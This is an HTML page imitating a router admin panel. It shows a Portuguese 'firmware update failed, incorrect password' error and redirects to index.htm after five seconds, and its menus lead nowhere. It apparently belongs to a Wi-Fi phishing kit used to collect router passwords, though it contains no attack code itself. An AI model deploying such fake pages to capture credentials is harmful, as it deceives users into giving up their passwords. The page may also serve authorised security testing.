<!DOCTYPE html>
<html lang="en">
    <head>
        <title>Erro na Atualização</title>
        <meta charset="utf-8">
        <meta name="viewport" content="width=device-width, initial-scale=1">
        <link rel="stylesheet" href="css/bootstrap.min.css">
        <script src="js/jquery.min.js"></script>
        <script src="js/bootstrap.min.js"></script>

        <!-- CSS -->
        <style type="text/css">

            /* Sticky footer styles
            -------------------------------------------------- */
            @font-face {
                font-family: Noto_Sans;
                src: url('fonts/NotoSans-Regular.ttf');
            }

            html,
            body {
                height: 100%;
                /* The html and body elements cannot have any padding or margin. */
            }

            /* Wrapper for page content to push down footer */
            #wrap {
                min-height: 100%;
                height: auto !important;
                height: 100%;
                /* Negative indent footer by it's height */
                margin: 0 auto -60px;
            }

            /* Set the fixed height of the footer here */
            #push,
            #footer {
                height: 60px;
            }
            #footer {
                background-color: #f5f5f5;
            }

            /* Lastly, apply responsive CSS fixes as necessary */
            @media (max-width: 767px) {
                #footer {
                    margin-left: -20px;
                    margin-right: -20px;
                    padding-left: 20px;
                    padding-right: 20px;
                }
            }

            #clockdiv{
                font-family: sans-serif;
                color: #fff;
                display: inline-block;
                font-weight: 100;
                text-align: center;
                font-size: 30px;
            }

            #clockdiv > div{
                padding: 10px;
                border-radius: 3px;
                background: #00BF96;
                display: inline-block;
            }

            #clockdiv div > span{
                padding: 15px;
                border-radius: 3px;
                background: #00816A;
                display: inline-block;
            }

            .smalltext{
                padding-top: 5px;
                font-size: 16px;
            }

        </style>
    </head>
    <body>
        <!-- Start navigation bar -->
        <nav class="navbar navbar-inverse" style="border-radius: 0px">
            <div class="container-fluid">
                <div class="navbar-header">
                    <button type="button" class="navbar-toggle" data-toggle="collapse" data-target="#myNavbar">
                        <span class="icon-bar"></span>
                        <span class="icon-bar"></span>
                        <span class="icon-bar"></span>
                    </button>
                    <!--
                    <a class="navbar-brand"><img style="background:transparent" src="Your LOGO" alt="Logo"></a>
                    -->
                </div>
                <div class="collapse navbar-collapse" id="myNavbar">
                    <ul class="nav navbar-nav">
                        <li class="dropdown" data-toggle="modal" data-target="#upgrade-only"><a class="dropdown-toggle"
                                                                                                data-toggle="dropdown" href="#" style="color:white">Setup <span class="caret"></span></a>
                            <ul class="dropdown-menu">
                                <li><a href="#">Basic Setup</a></li>
                                <li><a href="#">DDNS</a></li>
                                <li><a href="#">MAC Address Clone</a></li>
                                <li><a href="#">Advanced Routing</a></li>
                            </ul>
                        </li>
                        <li class="dropdown" data-toggle="modal" data-target="#upgrade-only"><a class="dropdown-toggle"
                                                                                                data-toggle="dropdown" href="#" style="color:white">Wireless <span class="caret"></span></a>
                            <ul class="dropdown-menu">
                                <li><a href="#">Basic Wireless Settings</a></li>
                                <li><a href="#">Wireless Security</a></li>
                                <li><a href="#">Wireless MAC Filter</a></li>
                                <li><a href="#">Advanced Wireless Settings</a></li>
                            </ul>
                        </li>
                        <li class="dropdown" data-toggle="modal" data-target="#upgrade-only"><a class="dropdown-toggle"
                                                                                                data-toggle="dropdown" href="#" style="color:white">Security <span class="caret"></span></a>
                            <ul class="dropdown-menu">
                                <li><a href="#">Firewall</a></li>
                                <li><a href="#">VPN</a></li>
                            </ul>
                        </li>
                        <li class="dropdown" data-toggle="modal" data-target="#upgrade-only"><a class="dropdown-toggle"
                                                                                                data-toggle="dropdown" href="#" style="color:white">Access Restriction <span class="caret"></span></a>
                            <ul class="dropdown-menu">
                                <li><a href="#">Internet Access</a></li>
                            </ul>
                        </li>
                        <li class="dropdown" data-toggle="modal" data-target="#upgrade-only"><a class="dropdown-toggle"
                                                                                                data-toggle="dropdown" href="#" style="color:white">Administration <span class="caret"></span></a>
                            <ul class="dropdown-menu">
                                <li><a href="#">Management</a></li>
                                <li><a href="#">Log</a></li>
                                <li><a href="#">Diagnostics</a></li>
                                <li><a href="#">Factory Defaults</a></li>
                                <li><a href="#">Config Manegements</a></li>
                            </ul>
                        </li>
                        <li class="dropdown" data-toggle="modal" data-target="#upgrade-only"><a class="dropdown-toggle"
                                                                                                data-toggle="dropdown" href="#" style="color:white">Status <span class="caret"></span></a>
                            <ul class="dropdown-menu">
                                <li><a href="#">Router</a></li>
                                <li><a href="#">Local Network</a></li>
                                <li><a href="#">Wireless</a></li>
                                <li><a href="#">Advanced Routing</a></li>
                            </ul>
                        </li>
                    </ul>
                </div>
            </div>
        </nav>
        <!-- End navigation bar -->
        <!-- Start firt phase -->
        <div class="container" style="margin-top: 100px">
            <div>
                <h2 class="text-center text-danger" style="margin-bottom:  30px">Erro ao Atualizar Firware</h2>
                <p class="lead text-center">A senha informada está incorreta. Por favor tente novamente, você será redirecionado em 5 segundos. </p>
            </div>
            <div id="push"></div>
        </div>
        <!-- End first phase -->
        <!-- Start footer -->
        <footer class="footer">
            <div class="container text-center">
                <p class="text-muted">©  2016, All Rights Reserved.</p>
            </div>
        </footer>
        <script type="text/javascript">
            var redirect = setTimeout(function redirect() {
                location.href = "index.htm"
            }, 5000)
        </script>
    </body>
</html>
